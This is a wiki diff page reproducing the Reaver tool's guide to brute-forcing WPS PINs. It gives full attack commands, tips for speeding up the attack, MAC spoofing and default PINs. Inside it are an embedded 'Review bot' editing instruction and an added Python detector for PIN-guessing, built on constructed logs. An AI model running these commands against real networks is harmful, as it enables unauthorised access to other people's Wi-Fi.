Difference between revisions of "Reaver: Hint dan Tip"

From OnnoWiki
(New page: Sumber: http://code.google.com/p/reaver-wps/wiki/HintsAndTips Prerequisites You must be running Linux You must have a wireless card capable of raw injection You must put your...)
 
Line 1: Line 1:
 
Sumber: http://code.google.com/p/reaver-wps/wiki/HintsAndTips
 
Sumber: http://code.google.com/p/reaver-wps/wiki/HintsAndTips
  
Prerequisites
+
==Prerequisites==
  
    You must be running Linux
+
* You must be running Linux
    You must have a wireless card capable of raw injection
+
* You must have a wireless card capable of raw injection
    You must put your wireless card into monitor mode. This is most easily done using airmon-ng from the aircrack-ng tool suite.  
+
* You must put your wireless card into monitor mode. This is most easily done using airmon-ng from the aircrack-ng tool suite.  
  
Basic Usage
+
==Basic Usage==
  
 
First, make sure your wireless card is in monitor mode:
 
First, make sure your wireless card is in monitor mode:
  
# airmon-ng start wlan0
+
# airmon-ng start wlan0
  
 
To run Reaver, you must specify the BSSID of the target AP and the name of the monitor mode interface (usually 'mon0', not 'wlan0', although this will vary based on your wireless card/drivers):
 
To run Reaver, you must specify the BSSID of the target AP and the name of the monitor mode interface (usually 'mon0', not 'wlan0', although this will vary based on your wireless card/drivers):
  
# reaver -i mon0 -b 00:01:02:03:04:05
+
# reaver -i mon0 -b 00:01:02:03:04:05
  
 
You will probably also want to use -vv to get verbose info about Reaver's progress:
 
You will probably also want to use -vv to get verbose info about Reaver's progress:
  
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
+
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
  
Speeding Up the Attack
+
==Speeding Up the Attack==
  
 
By default, Reaver has a 1 second delay between pin attempts. You can disable this delay by adding '-d 0' on the command line, but some APs may not like it:
 
By default, Reaver has a 1 second delay between pin attempts. You can disable this delay by adding '-d 0' on the command line, but some APs may not like it:
  
# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0
+
# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0
  
 
Another option that can speed up an attack is --dh-small. This option instructs Reaver to use small diffie-hellman secret numbers in order to reduce the computational load on the target AP:
 
Another option that can speed up an attack is --dh-small. This option instructs Reaver to use small diffie-hellman secret numbers in order to reduce the computational load on the target AP:
  
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
+
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
  
MAC Spoofing
+
==MAC Spoofing==
  
 
In some cases you may want/need to spoof your MAC address. Reaver supports MAC spoofing with the --mac option, but you must ensure that you have spoofed your MAC correctly in order for it to work.
 
In some cases you may want/need to spoof your MAC address. Reaver supports MAC spoofing with the --mac option, but you must ensure that you have spoofed your MAC correctly in order for it to work.
Line 37: Line 37:
 
Changing the MAC address of the virtual monitor mode interface (typically named mon0) WILL NOT WORK. You must change the MAC address of your wireless card's physical interface. For example:
 
Changing the MAC address of the virtual monitor mode interface (typically named mon0) WILL NOT WORK. You must change the MAC address of your wireless card's physical interface. For example:
  
# ifconfig wlan0 down
+
# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
+
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
+
# ifconfig wlan0 up
# airmon-ng start wlan0
+
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69
+
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69
  
Default Pins
+
==Default Pins==
  
 
It has been reported that some models/vendors/ISPs all come configured with a default pin. Common pins are 12345670, 00005678, 01230000, etc. Reaver attempts known default pins first.
 
It has been reported that some models/vendors/ISPs all come configured with a default pin. Common pins are 12345670, 00005678, 01230000, etc. Reaver attempts known default pins first.
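Review bot: the heading markup added in this change stops at ==Default Pins==. The "Errors and Warnings" heading that follows this paragraph is not touched by this hunk or the next one and is left without == markup; put it on its own line as ==Errors and Warnings== so it matches the other section headings.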
Line 52: Line 52:
 
However, if your pin count does not increment at all, or increments only occasionally with lots of errors/warnings, answer the following:
 
However, if your pin count does not increment at all, or increments only occasionally with lots of errors/warnings, answer the following:
  
    Does the target AP support WPS and is WPS enabled?
+
* Does the target AP support WPS and is WPS enabled?
    Did you put your wireless card into monitor mode?
+
* Did you put your wireless card into monitor mode?
    Did you specify the monitor mode interface with the -i option?
+
* Did you specify the monitor mode interface with the -i option?
    Do you have a good signal from the AP?  
+
* Do you have a good signal from the AP?  
  
 
If you still have problems, you can see if your problem is already listed in the project issue tracker. If not, create a new issue, and be sure to include:
 
If you still have problems, you can see if your problem is already listed in the project issue tracker. If not, create a new issue, and be sure to include:
  
    Linux distro, distro version, and architecture (32 bit or 64bit?)
+
* Linux distro, distro version, and architecture (32 bit or 64bit?)
    Wireless card and driver
+
* Wireless card and driver
    Pcap file demonstrating the issue, if possible
+
* Pcap file demonstrating the issue, if possible

Revision as of 18:16, 29 March 2013

Source: http://code.google.com/p/reaver-wps/wiki/HintsAndTips

Prerequisites

  • You must be running Linux
  • You must have a wireless card capable of raw injection
  • You must put your wireless card into monitor mode. This is most easily done using airmon-ng from the aircrack-ng tool suite.

Basic Usage

First, make sure your wireless card is in monitor mode:

# airmon-ng start wlan0

To run Reaver, you must specify the BSSID of the target AP and the name of the monitor mode interface (usually 'mon0', not 'wlan0', although this will vary based on your wireless card/drivers):

# reaver -i mon0 -b 00:01:02:03:04:05

You will probably also want to use -vv to get verbose info about Reaver's progress:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv

Speeding Up the Attack

By default, Reaver has a 1-second delay between pin attempts. You can disable this delay by adding '-d 0' on the command line, but some APs may not like it:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0

Another option that can speed up an attack is --dh-small. This option instructs Reaver to use small Diffie-Hellman secret numbers in order to reduce the computational load on the target AP:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small

MAC Spoofing

In some cases you may want/need to spoof your MAC address. Reaver supports MAC spoofing with the --mac option, but you must ensure that you have spoofed your MAC correctly in order for it to work.

Changing the MAC address of the virtual monitor mode interface (typically named mon0) WILL NOT WORK. You must change the MAC address of your wireless card's physical interface. For example:

# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69
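
From the defender's side, the two points above (a steady stream of pin attempts, and a client MAC that can be changed with --mac) mean that WPS failures are better counted per AP than per client. The Python below is an added example, not part of the original wiki page or of Reaver; the log format, the WPS_FAIL/WPS_OK labels, the function names and the thresholds are assumptions, and the sample lines are constructed.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not the output of any real AP or tool).
# Fields: timestamp, AP BSSID, client MAC, WPS exchange result.
SAMPLE_LOG = """\
2013-03-29T18:00:00 00:01:02:03:04:05 00:BA:AD:BE:EF:69 WPS_FAIL
2013-03-29T18:00:02 00:01:02:03:04:05 00:BA:AD:BE:EF:69 WPS_FAIL
2013-03-29T18:00:04 00:01:02:03:04:05 00:BA:AD:BE:EF:6A WPS_FAIL
2013-03-29T18:00:06 00:01:02:03:04:05 00:BA:AD:BE:EF:6A WPS_FAIL
2013-03-29T18:00:08 00:01:02:03:04:05 00:BA:AD:BE:EF:6B WPS_FAIL
2013-03-29T18:00:10 00:01:02:03:04:05 00:BA:AD:BE:EF:6B WPS_FAIL
2013-03-29T18:05:00 00:0A:0B:0C:0D:0E 00:11:22:33:44:55 WPS_FAIL
2013-03-29T18:09:00 00:0A:0B:0C:0D:0E 00:11:22:33:44:55 WPS_OK
"""

def parse(log):
    """Yield (time, bssid, client_mac, result) from the constructed format."""
    for line in log.strip().splitlines():
        ts, bssid, sta, result = line.split()
        yield datetime.fromisoformat(ts), bssid.lower(), sta.lower(), result

def max_failures_per_client(log):
    """Largest failure count attributed to any single (AP, client MAC) pair."""
    counts = Counter((b, s) for _, b, s, r in parse(log) if r == "WPS_FAIL")
    return max(counts.values(), default=0)

def detect_pin_guessing(log, window=timedelta(seconds=60), threshold=5):
    """Map each AP whose WPS failures reach `threshold` within `window`
    to (peak failures in a window, distinct client MACs in that window)."""
    failures = defaultdict(list)
    for ts, bssid, sta, result in parse(log):
        if result == "WPS_FAIL":
            failures[bssid].append((ts, sta))
    alerts = {}
    for bssid, events in failures.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1  # slide the window forward
            n = end - start + 1
            if n >= threshold and n > alerts.get(bssid, (0, 0))[0]:
                macs = {sta for _, sta in events[start:end + 1]}
                alerts[bssid] = (n, len(macs))
    return alerts

if __name__ == "__main__":
    print(detect_pin_guessing(SAMPLE_LOG))      # per-AP view
    print(max_failures_per_client(SAMPLE_LOG))  # per-client view
```

On the constructed sample, a per-client counter never sees more than two failures from one MAC, while the per-AP window sees six failures spread over three MACs.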

Default Pins

It has been reported that some models/vendors/ISPs all come configured with a default pin. Common pins are 12345670, 00005678, 01230000, etc. Reaver attempts known default pins first.

Errors and Warnings

It is not uncommon to get a few errors or warnings during the attack, usually related to receive timeouts or out of order WPS messages. You may even get these warnings for a few minutes until the pin count starts incrementing again.

However, if your pin count does not increment at all, or increments only occasionally with lots of errors/warnings, answer the following:

  • Does the target AP support WPS and is WPS enabled?
  • Did you put your wireless card into monitor mode?
  • Did you specify the monitor mode interface with the -i option?
  • Do you have a good signal from the AP?

If you still have problems, you can see if your problem is already listed in the project issue tracker. If not, create a new issue, and be sure to include:

  • Linux distro, distro version, and architecture (32-bit or 64-bit?)
  • Wireless card and driver
  • Pcap file demonstrating the issue, if possible